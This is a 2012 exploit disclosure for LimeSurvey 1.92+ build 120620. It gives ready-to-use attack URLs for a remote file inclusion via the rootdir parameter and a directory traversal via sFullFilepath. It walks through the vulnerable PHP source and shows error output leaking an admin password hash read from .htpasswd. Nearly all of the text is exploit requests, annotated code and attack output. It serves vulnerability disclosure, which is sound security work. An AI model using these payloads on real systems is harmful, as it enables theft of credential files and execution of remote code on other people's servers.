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  [ Discovered by dun \ posdub[at]gmail.com ]
  [ 2012-06-22                              ]
#  [ LimeSurvey 1.92+ build 120620 ]  Multiple Vulnerabilities  #
# Script: "LimeSurvey - the free and open source survey software tool"
# Vendor:   http://www.limesurvey.org/
# Download: http://download.limesurvey.org/Latest_stable_release/limesurvey192plus-build120620.zip
# [RFI] ( allow_url_include = On; register_globals = On; )
# Versions affected: 1.92+ build 120620
# Vuln: http://localhost/limesurvey/replacements.php?rootdir=http://localhost/phpinfo.txt?
  File: ./limesurvey/replacements.php (line 3)
  global $rootdir;
  include_once($rootdir.'/classes/expressions/LimeExpressionManager.php');                     // [RFI]
# [Directory Traversal] ( display_errors On; register_globals = On; )
# Versions affected: 1.92+ build 120620 and previous
# Vuln: http://localhost/limesurvey/admin/importsurvey.php?copyfunction=1&sExtension=lss&sFullFilepath=../../secret/.htpasswd
  File: ./limesurvey/admin/importsurvey.php (lines 18-38)
  if ((!isset($importingfrom) && !isset($copyfunction)) || isset($_REQUEST['importingfrom']))   // 1 false if $copyfunction is set
      die("Cannot run this script directly");
  require_once('import_functions.php');                                                         // 2 include functions
  if (!isset($copyfunction))
      $aPathInfo = pathinfo($sFullFilepath);
      $sExtension = $aPathInfo['extension'];
  if (isset($sExtension) && strtolower($sExtension)=='csv')
  elseif (isset($sExtension) && strtolower($sExtension)=='lss')                                 // 3 true if $sExtension = 'lss'
      $aImportResults=XMLImportSurvey($sFullFilepath,null,null, null,(isset($_POST['translinksfields']))); // 4 $sFullFilepath -> our file
  File: ./limesurvey/admin/import_functions.php (lines 1080-1087) 
  function XMLImportSurvey($sFullFilepath,$sXMLdata=NULL,$sNewSurveyName=NULL,$iDesiredSurveyId=NULL, $bTranslateInsertansTags=true)
      global $connect, $dbprefix, $clang, $timeadjust;
      if ($sXMLdata == NULL)
          $xml = simplexml_load_file($sFullFilepath);                                           // 5 try to open our file as xmlfile
This should return a warning with the first line of our file.
In this case: admin:$apr1$zq2Yh9mB$R9WIiMX4YwOnhDon1kvc5/ from .htpasswd :)
Something like this:
  Warning: simplexml_load_file() [function.simplexml-load-file]:
  ../../secret/.htpasswd:1:parser error : Start tag expected, '<' not found in /www/limesurvey/admin/import_functions.php on line 1087
  Warning: simplexml_load_file() [function.simplexml-load-file]:
  admin:$apr1$zq2Yh9mB$R9WIiMX4YwOnhDon1kvc5/ in /www/limesurvey/admin/import_functions.php on line 1087
  Warning: simplexml_load_file() [function.simplexml-load-file]:
  ^ in /www/limesurvey/admin/import_functions.php on line 1087
### [ dun / 2012 ] #####################################################